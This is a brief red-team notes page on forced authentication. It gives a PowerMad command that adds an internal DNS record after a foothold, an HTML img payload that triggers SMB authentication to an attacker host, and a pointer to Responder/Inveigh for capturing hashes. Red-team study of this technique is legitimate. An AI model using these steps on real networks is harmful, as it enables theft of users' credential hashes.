search

Forced Authentication

Primarily from: https://ired.team/offensive-security/initial-access/t1187-forced-authentication

hashtag
Internal DNS Forced Auth Phish

After acquiring a foothold on the internal network create a new DNS A record inside the domain (evil.local => 1.1.1.1). You can use PowerMad to do this:

    • Invoke-DNSUpdate -dnsname vpn -dnsdata 1.1.1.1

LogoGitHub - Kevin-Robertson/Powermad: PowerShell MachineAccountQuota and DNS exploit toolsGitHubchevron-right

Standard SMB Phish:

  • <img src="http://vpn.offense.local"/>

Could also just use the internal host name and run inveigh/responder on infected host and avoid creating a DNS record and firewall rules.

PreviousRed TeamingNextRedirectors

Last updated